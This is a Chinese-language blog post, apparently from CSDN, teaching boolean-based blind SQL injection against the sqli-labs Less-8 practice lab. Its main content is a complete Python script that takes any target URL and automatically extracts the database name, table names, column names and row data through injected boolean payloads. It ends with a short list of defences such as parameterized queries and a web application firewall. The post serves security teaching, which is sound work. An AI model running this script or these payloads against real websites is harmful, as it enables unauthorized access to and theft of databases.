SQL布尔盲注漏洞

最新推荐文章于 2023-02-03 14:17:07 发布
最新推荐文章于 2023-02-03 14:17:07 发布
阅读量560 收藏 4
点赞数 1
分类专栏: Python安全 文章标签: python安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/113843869
版权

原理

目前常用的SQL盲注主要有以下两类:

  1. 基于布尔的盲注: 当页面没有回显位、不会输出SQL语句报错信息时,通过返回页面响应的正常或不正常的情况来进行注入。
  2. 基于时间的盲注: 当页面没有回显位、不会输出SQL语句报错信息时,不论SQL语句的执行结果对错都返回一样的页面时,通过页面的响应时间进行注入。

缺点: 两种盲注方式都需要耗费大量的精力去进行测试,因此在渗透测试过程中常使用工具(sqlmap)或脚本来代替手工操作。

以下我们将使用sqli-labs-Less8靶场进行操作和演示,注入成功则会显示"You are in …",反之不会。攻击演示只是简单地展示了攻击的原理,大佬请自行绕过~~~~

基于布尔型的SQL盲注

获取数据库长度
在这里插入图片描述
获取数据库名
在这里插入图片描述
获取数据库表名称的长度
在这里插入图片描述
获取表的字段数量
在这里插入图片描述
获取数据库表的数量
在这里插入图片描述
获取数据库表名
在这里插入图片描述
获取字段的长度

在这里插入图片描述
获取表的字段
在这里插入图片描述
获取字段数据的数量
在这里插入图片描述
获取字段数据的长度
在这里插入图片描述
获取字段数据
在这里插入图片描述

代码展示

写入脚本信息,导入模块,定义存储数据库数据的变量且定义一个request对象用来进行请求

#!/usr/bin/python3
# -*- coding: utf-8 -*-


import requests
import optparse

# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}
# 若页面返回真,则会出现You are in...........
flag = "You are in..........."

# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False

编写主函数,用来调用各个函数进行自动化注入

# 盲注主函数
def StartSqli(url):
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url, DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for item in range(len(DBTables)):
        print("(" + str(item + 1) + ")" + DBTables[item])
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    GetDBColumns(url, DBName, DBTables[tableIndex])
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for item in range(len(DBColumns)):
            print("(" + str(item + 1) + ")" + DBColumns[item])
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1
        if (columnIndex == -1):
            break
        else:
            GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])

编写获取数据库名的函数,根据得到的URL获取数据库名并把最后的结果存入DBName

# 获取数据库名函数
def GetDBName(url):
    # 引用全局变量DBName,用来存放网页当前使用的数据库名
    global DBName
    print("[-]开始获取数据库名长度")
    # 保存数据库名长度变量
    DBNameLen = 0
    # 用于检查数据库名长度的payload
    payload = "' and if(length(database())={0},1,0) %23"
    # 把URL和payload进行拼接得到最终的请求URL
    targetUrl = url + payload
    # 用for循环来遍历请求,得到数据库名长度
    for DBNameLen in range(1, 99):
        # 对payload中的参数进行赋值猜解
        res = conn.get(targetUrl.format(DBNameLen))
        # 判断flag是否在返回的页面中
        if flag in res.content.decode("utf-8"):
            print("[+]数据库名长度:" + str(DBNameLen))
            break
    print("[-]开始获取数据库名")
    payload = "' and if(ascii(substr(database(),{0},1))={1},1,0) %23"
    targetUrl = url + payload
    # a表示substr()函数的截取起始位置
    for a in range(1, DBNameLen + 1):
        # b表示33~127位ASCII中可显示字符
        for b in range(33, 128):
            res = conn.get(targetUrl.format(a, b))
            if flag in res.content.decode("utf-8"):
                DBName += chr(b)
                print("[-]" + DBName)
                break

编写获取数据表的函数,根据获取到的URL和数据库名获取数据库中的表,并把结果以列表的形式存入DBTables

# 获取数据库表函数
def GetDBTables(url, dbname):
    global DBTables
    # 存放数据库表数量的变量
    DBTableCount = 0
    print("[-]开始获取{0}数据库表数量:".format(dbname))
    # 获取数据库表数量的payload
    payload = "' and if((select count(*)table_name from information_schema.tables where table_schema='{0}')={1},1,0) %23"
    targetUrl = url + payload
    # 开始遍历获取数据库表的数量
    for DBTableCount in range(1, 99):
        res = conn.get(targetUrl.format(dbname, DBTableCount))
        if flag in res.content.decode("utf-8"):
            print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))
            break
    print("[-]开始获取{0}数据库的表".format(dbname))
    # 遍历表名时临时存放表名长度变量
    tableLen = 0
    # a表示当前正在获取表的索引
    for a in range(0, DBTableCount):
        print("[-]正在获取第{0}个表名".format(a + 1))
        # 先获取当前表名的长度
        for tableLen in range(1, 99):
            payload = "' and if((select LENGTH(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},1,0) %23"
            targetUrl = url + payload
            res = conn.get(targetUrl.format(dbname, a, tableLen))
            if flag in res.content.decode("utf-8"):
                break
        # 开始获取表名
        # 临时存放当前表名的变量
        table = ""
        # b表示当前表名猜解的位置
        for b in range(1, tableLen + 1):
            payload = "' and if(ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1))={3},1,0) %23"
            targetUrl = url + payload
            # c表示33~127位ASCII中可显示字符
            for c in range(33, 128):
                res = conn.get(targetUrl.format(dbname, a, b, c))
                if flag in res.content.decode("utf-8"):
                    table += chr(c)
                    print(table)
                    break
        # 把获取到的名加入到DBTables
        DBTables.append(table)
        # 清空table,用来继续获取下一个表名
        table = ""

编写获取表字段的函数,根据获取的URL、数据库名和数据库表,获取表的字段并把结果以列表的形式存入DBColumns

# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):
    global DBColumns
    # 存放字段数量的变量
    DBColumnCount = 0
    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    for DBColumnCount in range(99):
        payload = "' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},1,0) %23"
        targetUrl = url + payload
        res = conn.get(targetUrl.format(dbname, dbtable, DBColumnCount))
        if flag in res.content.decode("utf-8"):
            print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))
            break
    # 开始获取字段的名称
    # 保存字段名的临时变量
    column = ""
    # a表示当前获取字段的索引
    for a in range(0, DBColumnCount):
        print("[-]正在获取第{0}个字段名".format(a + 1))
        # 先获取字段的长度
        for columnLen in range(99):
            payload = "' and if((select length(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},1,0) %23"
            targetUrl = url + payload
            res = conn.get(targetUrl.format(dbname, dbtable, a, columnLen))
            if flag in res.content.decode("utf-8"):
                break
        # b表示当前字段名猜解的位置
        for b in range(1, columnLen + 1):
            payload = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},1,0) %23"
            targetUrl = url + payload
            # c表示33~127位ASCII中可显示字符
            for c in range(33, 128):
                res = conn.get(targetUrl.format(dbname, dbtable, a, b, c))
                if flag in res.content.decode("utf-8"):
                    column += chr(c)
                    print(column)
                    break
        # 把获取到的名加入到DBColumns
        DBColumns.append(column)
        # 清空column,用来继续获取下一个字段名
        column = ""

编写数据获取函数,根据获取的URL、数据库名和数据表字段来获取数据。数据以字典的形式存放,键为字段名,值为字段数据形成的列表

# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
    global DBData
    # 先获取字段数据数量
    DBDataCount = 0
    print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
    for DBDataCount in range(99):
        payload = "'and if ((select count({0}) from {1})={2},1,0)  %23"
        targetUrl = url + payload
        res = conn.get(targetUrl.format(dbcolumn, dbtable, DBDataCount))
        if flag in res.content.decode("utf-8"):
            print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
            break
    for a in range(0, DBDataCount):
        print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a + 1))
        # 先获取这个数据的长度
        dataLen = 0
        for dataLen in range(99):
            payload = "'and if ((select length({0}) from {1} limit {2},1)={3},1,0)  %23"
            targetUrl = url + payload
            res = conn.get(targetUrl.format(dbcolumn, dbtable, a, dataLen))
            if flag in res.content.decode("utf-8"):
                print("[-]第{0}个数据长度为:{1}".format(a + 1, dataLen))
                break
        # 临时存放数据内容变量
        data = ""
        # 开始获取数据的具体内容
        # b表示当前数据内容猜解的位置
        for b in range(1, dataLen + 1):
            for c in range(33, 128):
                payload = "'and if (ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},1,0)  %23"
                targetUrl = url + payload
                res = conn.get(targetUrl.format(dbcolumn, dbtable, a, b, c))
                if flag in res.content.decode("utf-8"):
                    data += chr(c)
                    print(data)
                    break
        # 放到以字段名为键,值为列表的字典中存放
        DBData.setdefault(dbcolumn, []).append(data)
        print(DBData)
        # 把data清空来,继续获取下一个数据
        data = ""

编写主函数,用来获取目标的URL并传递给StartSqli

if __name__ == '__main__':
    parser = optparse.OptionParser('usage: python %prog -u url \n\n'
                                   'Example: python %prog -u http://192.168.61.1/sql/Less-8/?id=1\n')
    # 目标URL参数-u
    parser.add_option('-u', '--url', dest='targetURL', default='http://127.0.0.1/sql/Less-8/?id=1', type='string',
                      help='target URL')
    (options, args) = parser.parse_args()
    StartSqli(options.targetURL)

运行效果如下图所示
在这里插入图片描述

在这里插入图片描述

防御策略

  1. 用参数化查询的方式代替动态SQL
  2. 避免显示数据库的错误信息
  3. 在服务器上安装Web应用程序防火墙(WAF)
  4. 限制数据库的权限
  5. 对于数据库中的敏感信息进行加密保存
  6. 根据需求升级数据库的版本,避免旧版数据库中的已知漏洞
平凡的学者
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL入之基于布尔详解
09-10
首先说明的入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL入。一般分为布尔和基于时间的。这篇文章主要讲解的是基于布尔。下面来一起看看吧。
SQL漏洞——sql
xiaoheizi的博客
06-12 351
sleep(5) #SQL语句延时执行5秒 substr(a,b,c) #从位置b开始,截取字符串a的c长度 left(database(),1) #left(a,b)从左侧截取a的前b位 length(database())=8 #判断数据库database()名的长度
SQL漏洞(union +
m0_61506558的博客
09-16 1527
数据库漏洞一直处于OWASP前几名,虽然在2021年滑到第三,漏洞的危害是不言而喻的,数据库可以分为两种:关系型数据库:关系型数据库,存储的格式可以直观地反映实体间的关系。关系型数据库和常见的表格比较相似, 关系型数据库中表与表之间是有很多复杂的关联关系的。常见的关系型数据库有 MySQL,Oracle, PostgreSQL,SQL Server等。
iwebsec靶场 SQL漏洞通关笔记3- bool入(布尔
mooyuan的博客
11-26 2432
iwebsec靶场的SQL漏洞的第03关bool漏洞渗透,通过源码再来分析下布尔SQL入重点内容:(1)闭合方式是什么?iwebsec的第03关关卡为数字型(2)入类别是什么?这部分通过源码分析与手很容易判断出是布尔入(3)是否过滤了关键字?很明显通过源码,iwebsec的布尔型关卡无过滤任何信息了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的第3关bool入内容,初学者建议按部就班先使用手动入练习,再进行sqlmap渗透。
墨者 - SQL漏洞测试(布尔)
吃肉唐僧的博客
07-01 5055
手工入 根据浮动的通告进度条,找到sql入点 输入/new_list.php?id=1' and 1=1,内容空白 输入/new_list.php?id=1 and 1=1,内容显示,判断这个id的值类型是数字类型 然后开始判断数据库名字的长度,/new_list.php?id=1 and length(database())=1,内容空白。一直试,试到长度为10 ...
渗透测试技术----常见web漏洞--SQL攻击原理及防御
wwl012345的博客
08-19 3244
一、SQL攻击介绍 1.SQL简介 是在SQL入攻击过程中,服务器关闭了错误回显,我们单纯通过服务器返回的简单内容的变化来判断服务器是否存在入。 2.SQL的方法 (boolean-based)boolean型入:通过页面的返回内容是否正确来验证是否存在着入 (time-based)时间型入:通过SQL语句的处理时间的不同来判断是否存在入,时间型入可以使用be...
布尔.py_sqlpython_
10-03
一个简单的sql的python脚本,其中语句需要根据环境条件做改变
布尔python3范本模板
01-16
布尔python3范本模板
超级SQL入工具,支持布尔,报错,union入等
最新发布
03-27
超级SQL入工具目前支持Bool型、错误显示入、Union入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
Web应用安全:Sqlserver.pptx
06-19
1)基于布尔 SQL 。 2)基于时间的 SQL 。 3)基于报错的 SQL 。 2、基于布尔Sqlserver 原理:构造逻辑判断。 方式: 1)非正则匹配入。 2)like入。 Sqlserver 2、基于布尔Sqlserver...
SQL漏洞-SQL
HacHunter的博客
03-05 733
,从字面意思理解就是看不见的入,其实这还是属于入的一种,只是表现形式不同。是不能通过直接显示的途径来获取数据库数据的方法。在中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。也就是说执行插入的语句后,不管是否执行,是否成功,都不会回显详细的错误信息,不像普通入一样那么容易判断。但是,入攻击还是发生了,只是错误信息被屏蔽掉了,请记住这个就好。一般情况下,可分为三类: Booleanbase普通 Timebase 基于时间的...
sql入及漏洞
qidiandexiaowu
03-05 393
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://blog.csdn.net/liuy_uzhi/article/details/81180197 ———————————————— ...
SQL漏洞-04】布尔靶场实战
cc
02-03 6590
当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,不能使用联合查询入和报错入,这时我们可以考虑是否为基于布尔。 利用页面返回的布尔类型状态,正常或者不正常; 我们输入的语句让页面呈现出两种状态,相当于true和false,根据这两种状态可以判断我们输入的语句是否查询成功。布尔就是根据这两种状态,来反推我们输入的条件是真还是假。以sqli-labs-masterless-8关为例
SQL 漏洞(六)布尔
不秃头的程序Yang
06-11 1076
二、判断
mysql_二十八、MySQL
weixin_39990401的博客
01-18 263
在学习本实验之前,请确保已经学过“SQL入原理与实践”这个实验。在 SQL入原理与实践 这个实验中,我们已经知道了SQL入的原理,并且能够完成支持union 且有回显的入,这种情况是最简单的,最容易入的,那么,如果入点发生在update、insert等这些不会有返回内容而仅仅只返回true或者false的 SQL语句中,或者仅仅select而没有输出查询的内容时,是不是就不能获取数据了...
SQL 入-
weixin_53711701的博客
01-30 1632
SQL 入-
SQL入之布尔漏洞实战
weixin_44255593的博客
01-17 461
SQL入之布尔漏洞实战 实训目标 1、掌握SQL入原理; 2、了解MySQL的数据结构; 3、了解布尔相关语句; 解题方向 1、通过布尔得到后台账号,从而获得key。 经过测试,确定入点在维护界面的URL链接的id参数中,但是没有报错回显,故而要通过来进行判断。 手工入: 利用布尔,来进行爆库: 首先是爆数据库名: payload1(布尔):?id=1 orif(ascii(substr(database(),1,1))>1,1,0),该语句表示如果当前数据库首字母AS
sql如何修补_sql入数据库修复的两种实例方法
weixin_39944595的博客
12-21 523
这篇文章介绍了sql入数据库修复的两种实例方法,有需要的朋友可以参考一下1.第一种情况是 需要将指定的 入字符串全部替换掉(仅替换入的字符串为空)declare @delStr nvarchar(500)set @delStr='' --这里被入的字段串/****************************************//**********以下为操作实体*********...
SQL入之布尔
DM766924的博客
09-13 1525
什么是布尔判断SQL入? “布尔判断”指的是利用SQL语句**逻辑与(and)**操作,判断and两边的条件是否成立,SQL语句带入输入库查询后判断返回内容(通常返回值仅有非空和空两种状态),类似布尔型的true和false的两种状态。 布尔步骤: 第1步:确认入点 方法:通过增加 ’ 和增加--+释符,语句从执行失败变为执行成功判断入点 第2步:判断数据库版本 方法:主要因为5.0版本以下没有information_schema数据库,无法进行手动入; 由于无法回显数据,利用逻辑
哪些数据库可能存在布尔漏洞
07-13
以下是一些常见的数据库,在某些情况下可能存在布尔漏洞: 1. MySQL:MySQL 是一个常见的关系型数据库管理系统,它在处理布尔类型的条件语句时可能存在布尔漏洞。 2. PostgreSQL:PostgreSQL 是另一个常见的关系型数据库管理系统,它也可能存在布尔漏洞。 3. Microsoft SQL Server:Microsoft SQL Server 是微软的关系型数据库管理系统,它在某些情况下也可能存在布尔漏洞。 4. Oracle Database:Oracle Database 是甲骨文公司的关系型数据库管理系统,它也可能存在布尔漏洞。 5. SQLite:SQLite 是一种嵌入式数据库引擎,广泛用于移动设备和嵌入式系统中。在某些情况下,SQLite 也可能存在布尔漏洞。 需要意的是,不同的数据库系统在处理布尔类型的条件语句时可能存在不同的漏洞。此外,是否存在布尔漏洞还取决于具体的应用程序实现和安全配置。因此,在开发和使用数据库时,始终要意安全性,并采取适当的防护措施来防止布尔等安全漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值